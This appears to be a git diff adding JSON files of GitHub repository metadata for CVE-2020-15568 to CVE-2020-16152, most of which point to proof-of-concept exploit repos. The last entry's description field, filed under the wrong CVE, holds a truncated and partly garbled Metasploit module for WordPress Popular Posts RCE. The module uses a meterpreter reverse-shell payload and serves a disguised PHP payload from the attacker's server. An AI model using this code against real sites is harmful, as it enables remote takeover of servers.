"n0bugz\/CVE-2020-15568", + "owner": { + "login": "n0bugz", + "id": 68533113, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68533113?v=4", + "html_url": "https:\/\/github.com\/n0bugz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/n0bugz\/CVE-2020-15568", + "description": "A quick and easy POC for CVE-2020-15568", + "fork": false, + "created_at": "2022-10-22T17:20:01Z", + "updated_at": "2023-02-01T08:06:53Z", + "pushed_at": "2022-10-23T04:21:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604626744, + "name": "TerraMaster-TOS-CVE-2020-15568", + "full_name": "divinepwner\/TerraMaster-TOS-CVE-2020-15568", + "owner": { + "login": "divinepwner", + "id": 11449809, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11449809?v=4", + "html_url": "https:\/\/github.com\/divinepwner", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/divinepwner\/TerraMaster-TOS-CVE-2020-15568", + "description": "Repository for CVE-2020-15568 Metasploit module", + "fork": false, + "created_at": "2023-02-21T13:10:45Z", + "updated_at": "2023-02-24T05:59:53Z", + "pushed_at": "2023-02-21T13:10:47Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15778.json b/2020/CVE-2020-15778.json new file mode 100644 index 0000000000..2ec4fed155 --- /dev/null +++ b/2020/CVE-2020-15778.json @@ -0,0 +1,95 @@ +[ + { + "id": 280587151, + "name": "CVE-2020-15778", + "full_name": "cpandya2909\/CVE-2020-15778", + "owner": { + "login": "cpandya2909", + "id": 22931812, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22931812?v=4", + "html_url": "https:\/\/github.com\/cpandya2909", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cpandya2909\/CVE-2020-15778", + "description": null, + "fork": false, + "created_at": "2020-07-18T05:15:05Z", + "updated_at": "2024-11-02T06:09:19Z", + "pushed_at": "2023-03-27T14:08:14Z", + "stargazers_count": 140, + "watchers_count": 140, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 140, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 386119933, + "name": "CVE-2020-15778-Exploit", + "full_name": "Neko-chanQwQ\/CVE-2020-15778-Exploit", + "owner": { + "login": "Neko-chanQwQ", + "id": 83222283, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83222283?v=4", + "html_url": "https:\/\/github.com\/Neko-chanQwQ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Neko-chanQwQ\/CVE-2020-15778-Exploit", + "description": "Exploit for CVE-2020-15778(OpenSSH vul)", + "fork": false, + "created_at": "2021-07-15T01:04:24Z", + "updated_at": "2024-09-27T09:58:37Z", + "pushed_at": "2022-02-18T08:04:46Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 17, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 17, + "watchers": 34, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 697473781, + "name": "CVE-2020-15778", + "full_name": "Evan-Zhangyf\/CVE-2020-15778", + "owner": { + "login": "Evan-Zhangyf", + "id": 53845683, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53845683?v=4", + "html_url": "https:\/\/github.com\/Evan-Zhangyf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Evan-Zhangyf\/CVE-2020-15778", + "description": null, + "fork": false, + "created_at": "2023-09-27T19:58:18Z", + "updated_at": "2024-06-28T10:30:04Z", + "pushed_at": "2023-09-27T20:34:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15780.json b/2020/CVE-2020-15780.json new file mode 100644 index 0000000000..d7e23228c1 --- /dev/null +++ b/2020/CVE-2020-15780.json @@ -0,0 +1,33 @@ +[ + { + "id": 736422938, + "name": "CVE-2020-15780-exploit", + "full_name": "Annavid\/CVE-2020-15780-exploit", + "owner": { + "login": "Annavid", + "id": 33559901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33559901?v=4", + "html_url": "https:\/\/github.com\/Annavid", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Annavid\/CVE-2020-15780-exploit", + "description": null, + "fork": false, + "created_at": "2023-12-27T21:39:43Z", + "updated_at": "2023-12-27T21:41:05Z", + "pushed_at": "2023-12-27T21:41:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15802.json b/2020/CVE-2020-15802.json new file mode 100644 index 0000000000..febc0f3e81 --- /dev/null +++ b/2020/CVE-2020-15802.json @@ -0,0 +1,38 @@ +[ + { + "id": 525921405, + "name": "blur", + "full_name": "francozappa\/blur", + "owner": { + "login": "francozappa", + "id": 4628017, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4628017?v=4", + "html_url": "https:\/\/github.com\/francozappa", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/francozappa\/blur", + "description": "BLURtooth: Exploiting Cross-Transport Key Derivation in Bluetooth Classic and Bluetooth Low Energy [CVE-2020-15802] [CVE-2022-20361]", + "fork": false, + "created_at": "2022-08-17T19:05:38Z", + "updated_at": "2024-11-22T02:56:40Z", + "pushed_at": "2022-08-17T19:20:34Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bluetooth", + "bluetooth-le", + "bluetooth-low-energy", + "ctkd" + ], + "visibility": "public", + "forks": 5, + "watchers": 17, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15808.json b/2020/CVE-2020-15808.json new file mode 100644 index 0000000000..6941b4bbcd --- /dev/null +++ b/2020/CVE-2020-15808.json @@ -0,0 +1,33 @@ +[ + { + "id": 360273431, + "name": "CVE202015808", + "full_name": "manucuf\/CVE202015808", + "owner": { + "login": "manucuf", + "id": 25384017, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25384017?v=4", + "html_url": "https:\/\/github.com\/manucuf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/manucuf\/CVE202015808", + "description": "A proof of concept of CVE-2020-15808 vulnerability exploit on STM32F4 Discovery board", + "fork": false, + "created_at": "2021-04-21T18:48:28Z", + "updated_at": "2023-02-10T17:48:13Z", + "pushed_at": "2021-04-26T14:00:56Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15848.json b/2020/CVE-2020-15848.json new file mode 100644 index 0000000000..50c1e83428 --- /dev/null +++ b/2020/CVE-2020-15848.json @@ -0,0 +1,33 @@ +[ + { + "id": 635586009, + "name": "CVE-2020-15848", + "full_name": "faklad\/CVE-2020-15848", + "owner": { + "login": "faklad", + "id": 11819453, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11819453?v=4", + "html_url": "https:\/\/github.com\/faklad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/faklad\/CVE-2020-15848", + "description": "CVE-2020-15848", + "fork": false, + "created_at": "2023-05-03T02:35:08Z", + "updated_at": "2023-05-03T02:35:09Z", + "pushed_at": "2023-05-03T02:35:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15873.json b/2020/CVE-2020-15873.json new file mode 100644 index 0000000000..7b63f6f93b --- /dev/null +++ b/2020/CVE-2020-15873.json @@ -0,0 +1,33 @@ +[ + { + "id": 295692158, + "name": "cs4239-cve-2020-15873", + "full_name": "limerencee\/cs4239-cve-2020-15873", + "owner": { + "login": "limerencee", + "id": 25873970, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25873970?v=4", + "html_url": "https:\/\/github.com\/limerencee", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/limerencee\/cs4239-cve-2020-15873", + "description": "Proof of Concept of CVE-2020-15873 - Blind SQL Injection in Librenms < v1.65.1", + "fork": false, + "created_at": "2020-09-15T10:26:26Z", + "updated_at": "2020-10-05T04:34:32Z", + "pushed_at": "2020-09-21T12:14:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15906.json b/2020/CVE-2020-15906.json new file mode 100644 index 0000000000..de7714accc --- /dev/null +++ b/2020/CVE-2020-15906.json @@ -0,0 +1,38 @@ +[ + { + "id": 281907147, + "name": "CVE-2020-15906", + "full_name": "S1lkys\/CVE-2020-15906", + "owner": { + "login": "S1lkys", + "id": 40408435, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40408435?v=4", + "html_url": "https:\/\/github.com\/S1lkys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/S1lkys\/CVE-2020-15906", + "description": "Writeup of CVE-2020-15906", + "fork": false, + "created_at": "2020-07-23T09:20:53Z", + "updated_at": "2024-08-12T20:04:02Z", + "pushed_at": "2020-10-26T22:01:33Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2020-15906", + "exploit", + "exploitation" + ], + "visibility": "public", + "forks": 11, + "watchers": 44, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15916.json b/2020/CVE-2020-15916.json new file mode 100644 index 0000000000..52ae273144 --- /dev/null +++ b/2020/CVE-2020-15916.json @@ -0,0 +1,33 @@ +[ + { + "id": 872064512, + "name": "CVE-2020-15916", + "full_name": "geniuszlyy\/CVE-2020-15916", + "owner": { + "login": "geniuszlyy", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszlyy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszlyy\/CVE-2020-15916", + "description": "This project is a PoC for exploiting CVE-2020-15916, a vulnerability that allows unauthorized changes to the LAN configuration of a device", + "fork": false, + "created_at": "2024-10-13T17:30:19Z", + "updated_at": "2024-10-21T08:14:50Z", + "pushed_at": "2024-10-13T17:31:06Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15931.json b/2020/CVE-2020-15931.json new file mode 100644 index 0000000000..8b27550b60 --- /dev/null +++ b/2020/CVE-2020-15931.json @@ -0,0 +1,33 @@ +[ + { + "id": 283580002, + "name": "CVE-2020-15931", + "full_name": "optiv\/CVE-2020-15931", + "owner": { + "login": "optiv", + "id": 12102497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12102497?v=4", + "html_url": "https:\/\/github.com\/optiv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/optiv\/CVE-2020-15931", + "description": "Netwrix Account Lockout Examiner 4.1 Domain Admin Account Credential Disclosure Vulnerability", + "fork": false, + "created_at": "2020-07-29T19:02:29Z", + "updated_at": "2024-09-03T00:36:33Z", + "pushed_at": "2020-11-11T19:48:38Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 25, + "score": 0, + "subscribers_count": 9 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15956.json b/2020/CVE-2020-15956.json new file mode 100644 index 0000000000..970244f90e --- /dev/null +++ b/2020/CVE-2020-15956.json @@ -0,0 +1,33 @@ +[ + { + "id": 284867344, + "name": "cve-2020-15956", + "full_name": "megamagnus\/cve-2020-15956", + "owner": { + "login": "megamagnus", + "id": 68912653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68912653?v=4", + "html_url": "https:\/\/github.com\/megamagnus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/megamagnus\/cve-2020-15956", + "description": "ActiveMediaServer.exe in ACTi NVR3 Standard Server 3.0.12.42 allows remote unauthenticated attackers to trigger a buffer overflow and application termination via a malformed payload.", + "fork": false, + "created_at": "2020-08-04T03:27:24Z", + "updated_at": "2020-08-07T04:39:24Z", + "pushed_at": "2020-08-04T15:50:13Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-15999.json b/2020/CVE-2020-15999.json new file mode 100644 index 0000000000..7d3440652e --- /dev/null +++ b/2020/CVE-2020-15999.json @@ -0,0 +1,95 @@ +[ + { + "id": 309938736, + "name": "CVE-2020-15999", + "full_name": "oxfemale\/CVE-2020-15999", + "owner": { + "login": "oxfemale", + "id": 10085061, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10085061?v=4", + "html_url": "https:\/\/github.com\/oxfemale", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oxfemale\/CVE-2020-15999", + "description": "CVE-2020-15999", + "fork": false, + "created_at": "2020-11-04T08:22:45Z", + "updated_at": "2024-11-27T06:35:18Z", + "pushed_at": "2020-11-03T17:53:20Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 325615976, + "name": "CVE-2020-15999", + "full_name": "maarlo\/CVE-2020-15999", + "owner": { + "login": "maarlo", + "id": 47559976, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47559976?v=4", + "html_url": "https:\/\/github.com\/maarlo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maarlo\/CVE-2020-15999", + "description": "Repositorio con un script encargado de explotar la vulnerabilidad CVE-2020-15999", + "fork": false, + "created_at": "2020-12-30T18:02:23Z", + "updated_at": "2020-12-30T18:05:25Z", + "pushed_at": "2020-12-30T18:05:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 325637056, + "name": "CVE-2020-15999", + "full_name": "Marmeus\/CVE-2020-15999", + "owner": { + "login": "Marmeus", + "id": 28514875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28514875?v=4", + "html_url": "https:\/\/github.com\/Marmeus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Marmeus\/CVE-2020-15999", + "description": "Todos los materiales necesarios para la PoC en Chrome y ftview", + "fork": false, + "created_at": "2020-12-30T19:58:33Z", + "updated_at": "2024-11-20T09:19:31Z", + "pushed_at": "2021-01-04T15:01:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-16012.json b/2020/CVE-2020-16012.json new file mode 100644 index 0000000000..961fe7c2e5 --- /dev/null +++ b/2020/CVE-2020-16012.json @@ -0,0 +1,33 @@ +[ + { + "id": 312905644, + "name": "cve-2020-16012", + "full_name": "aleksejspopovs\/cve-2020-16012", + "owner": { + "login": "aleksejspopovs", + "id": 681080, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/681080?v=4", + "html_url": "https:\/\/github.com\/aleksejspopovs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aleksejspopovs\/cve-2020-16012", + "description": "PoC for CVE-2020-16012, a timing side channel in drawImage in Firefox & Chrome", + "fork": false, + "created_at": "2020-11-14T21:32:15Z", + "updated_at": "2024-03-29T02:49:35Z", + "pushed_at": "2021-01-11T17:57:36Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-1611.json b/2020/CVE-2020-1611.json new file mode 100644 index 0000000000..1f1bb02a05 --- /dev/null +++ b/2020/CVE-2020-1611.json @@ -0,0 +1,39 @@ +[ + { + "id": 235582404, + "name": "CVE-2020-1611", + "full_name": "Ibonok\/CVE-2020-1611", + "owner": { + "login": "Ibonok", + "id": 37837775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37837775?v=4", + "html_url": "https:\/\/github.com\/Ibonok", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Ibonok\/CVE-2020-1611", + "description": "Juniper Junos Space (CVE-2020-1611) (PoC)", + "fork": false, + "created_at": "2020-01-22T13:45:21Z", + "updated_at": "2024-08-12T19:56:54Z", + "pushed_at": "2020-01-22T14:01:32Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-1611", + "description", + "juniper", + "poc", + "vulnerability" + ], + "visibility": "public", + "forks": 7, + "watchers": 28, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-16125.json b/2020/CVE-2020-16125.json new file mode 100644 index 0000000000..c2477b7750 --- /dev/null +++ b/2020/CVE-2020-16125.json @@ -0,0 +1,33 @@ +[ + { + "id": 674139128, + "name": "CVE-2020-16125-Reproduction", + "full_name": "za970120604\/CVE-2020-16125-Reproduction", + "owner": { + "login": "za970120604", + "id": 72210437, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72210437?v=4", + "html_url": "https:\/\/github.com\/za970120604", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/za970120604\/CVE-2020-16125-Reproduction", + "description": null, + "fork": false, + "created_at": "2023-08-03T08:24:28Z", + "updated_at": "2024-03-14T11:06:33Z", + "pushed_at": "2023-08-03T08:33:01Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-16126.json b/2020/CVE-2020-16126.json new file mode 100644 index 0000000000..ab2d0888a5 --- /dev/null +++ b/2020/CVE-2020-16126.json @@ -0,0 +1,36 @@ +[ + { + "id": 312235133, + "name": "Ubuntu-Gnome-privilege-escalation", + "full_name": "zev3n\/Ubuntu-Gnome-privilege-escalation", + "owner": { + "login": "zev3n", + "id": 31406753, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31406753?v=4", + "html_url": "https:\/\/github.com\/zev3n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zev3n\/Ubuntu-Gnome-privilege-escalation", + "description": "A bash script exploit of [CVE-2020-16126\/CVE-2020-16127] to achieve privilege escalation.Ubuntu 16.04-20.04 LTS本地提权漏洞利用脚本。要求拥有Gnome图形化环境。", + "fork": false, + "created_at": "2020-11-12T09:58:42Z", + "updated_at": "2020-11-17T05:47:17Z", + "pushed_at": "2020-11-12T10:24:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "privilege-escalation-exploits", + "ubuntu" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-16152.json b/2020/CVE-2020-16152.json new file mode 100644 index 0000000000..5df37a3c89 --- /dev/null +++ b/2020/CVE-2020-16152.json @@ -0,0 +1,64 @@ +[ + { + "id": 291464552, + "name": "CVE-2020-16152", + "full_name": "eriknl\/CVE-2020-16152", + "owner": { + "login": "eriknl", + "id": 7977955, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7977955?v=4", + "html_url": "https:\/\/github.com\/eriknl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eriknl\/CVE-2020-16152", + "description": "Explanation and PoC for CVE-2020-16152", + "fork": false, + "created_at": "2020-08-30T12:18:12Z", + "updated_at": "2024-08-12T20:05:16Z", + "pushed_at": "2020-09-01T05:22:23Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 12, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 443713687, + "name": "nate158g-m-w-n-l-p-d-a-o-e", + "full_name": "Nate0634034090\/nate158g-m-w-n-l-p-d-a-o-e", + "owner": { + "login": "Nate0634034090", + "id": 95479220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95479220?v=4", + "html_url": "https:\/\/github.com\/Nate0634034090", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nate0634034090\/nate158g-m-w-n-l-p-d-a-o-e", + "description": "### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HTTP::Wordpress def initialize(info = {}) super( update_info( info, 'Name' => 'Wordpress Popular Posts Authenticated RCE', 'Description' => %q{ This exploit requires Metasploit to have a FQDN and the ability to run a payload web server on port 80, 443, or 8080. The FQDN must also not resolve to a reserved address (192\/172\/127\/10). The server must also respond to a HEAD request for the payload, prior to getting a GET request. This exploit leverages an authenticated improper input validation in Wordpress plugin Popular Posts <= 5.3.2. The exploit chain is rather complicated. Authentication is required and 'gd' for PHP is required on the server. Then the Popular Post plugin is reconfigured to allow for an arbitrary URL for the post image in the widget. A post is made, then requests are sent to the post to make it more popular than the previous #1 by 5. Once the post hits the top 5, and after a 60sec (we wait 90) server cache refresh, the homepage widget is loaded which triggers the plugin to download the payload from our server. Our payload has a 'GIF' header, and a double extension ('.gif.php') allowing for arbitrary PHP code to be executed. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Simone Cristofaro', # edb 'Jerome Bruandet' # original analysis ], 'References' => [ [ 'EDB', '50129' ], [ 'URL', 'https:\/\/blog.nintechnet.com\/improper-input-validation-fixed-in-wordpress-popular-posts-plugin\/' ], [ 'WPVDB', 'bd4f157c-a3d7-4535-a587-0102ba4e3009' ], [ 'URL', 'https:\/\/plugins.trac.wordpress.org\/changeset\/2542638' ], [ 'URL', 'https:\/\/github.com\/cabrerahector\/wordpress-popular-posts\/commit\/d9b274cf6812eb446e4103cb18f69897ec6fe601' ], [ 'CVE', '2021-42362' ] ], 'Platform' => ['php'], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Automatic Target', {}] ], 'DisclosureDate' => '2021-06-11', 'DefaultTarget' => 0, 'DefaultOptions' => { 'PAYLOAD' => 'php\/meterpreter\/reverse_tcp', 'WfsDelay' => 3000 # 50 minutes, other visitors to the site may trigger }, 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ], 'Reliability' => [ REPEATABLE_SESSION ] } ) ) register_options [ OptString.new('USERNAME', [true, 'Username of the account', 'admin']), OptString.new('PASSWORD', [true, 'Password of the account', 'admin']), OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '\/']), # https:\/\/github.com\/WordPress\/wordpress-develop\/blob\/5.8\/src\/wp-includes\/http.php#L560 OptString.new('SRVHOSTNAME', [true, 'FQDN of the metasploit server. Must not resolve to a reserved address (192\/10\/127\/172)', '']), # https:\/\/github.com\/WordPress\/wordpress-develop\/blob\/5.8\/src\/wp-includes\/http.php#L584 OptEnum.new('SRVPORT', [true, 'The local port to listen on.', 'login', ['80', '443', '8080']]), ] end def check return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online? checkcode = check_plugin_version_from_readme('wordpress-popular-posts', '5.3.3') if checkcode == CheckCode::Safe print_error('Popular Posts not a vulnerable version') end return checkcode end def trigger_payload(on_disk_payload_name) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => 'true' ) # loop this 5 times just incase there is a time delay in writing the file by the server (1..5).each do |i| print_status(\"Triggering shell at: #{normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name)} in 10 seconds. Attempt #{i} of 5\") Rex.sleep(10) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', 'wordpress-popular-posts', on_disk_payload_name), 'keep_cookies' => 'true' ) end if res && res.code == 404 print_error('Failed to find payload, may not have uploaded correctly.') end end def on_request_uri(cli, request, payload_name, post_id) if request.method == 'HEAD' print_good('Responding to initial HEAD request (passed check 1)') # according to https:\/\/stackoverflow.com\/questions\/3854842\/content-length-header-with-head-requests we should have a valid Content-Length # however that seems to be calculated dynamically, as it is overwritten to 0 on this response. leaving here as notes. # also didn't want to send the true payload in the body to make the size correct as that gives a higher chance of us getting caught return send_response(cli, '', { 'Content-Type' => 'image\/gif', 'Content-Length' => \"GIF#{payload.encoded}\".length.to_s }) end if request.method == 'GET' on_disk_payload_name = \"#{post_id}_#{payload_name}\" register_file_for_cleanup(on_disk_payload_name) print_good('Responding to GET request (passed check 2)') send_response(cli, \"GIF#{payload.encoded}\", 'Content-Type' => 'image\/gif') close_client(cli) # for some odd reason we need to close the connection manually for PHP\/WP to finish its functions Rex.sleep(2) # wait for WP to finish all the checks it needs trigger_payload(on_disk_payload_name) end print_status(\"Received unexpected #{request.method} request\") end def check_gd_installed(cookie) vprint_status('Checking if gd is installed') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 res.body.include? ' gd' end def get_wpp_admin_token(cookie) vprint_status('Retrieving wpp_admin token') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'GET', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'tools' } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 \/ normalize_uri(target_uri.path, 'wp-admin', 'options-general.php'), 'method' => 'POST', 'cookie' => cookie, 'keep_cookies' => 'true', 'vars_get' => { 'page' => 'wordpress-popular-posts', 'tab' => 'debug' }, 'vars_post' => { 'upload_thumb_src' => '', 'thumb_source' => 'custom_field', 'thumb_lazy_load' => 0, 'thumb_field' => 'wpp_thumbnail', 'thumb_field_resize' => 1, 'section' => 'thumb', 'wpp-admin-token' => token } ) fail_with(Failure::Unreachable, 'Site not responding') unless res fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200 fail_with(Failure::UnexpectedReply, 'Unable to save\/change settings') unless \/Settings saved\/ =~ res.body end def clear_cache(cookie, token) vprint_status('Clearing image cache') res = send_request_cgi( 'uri' => 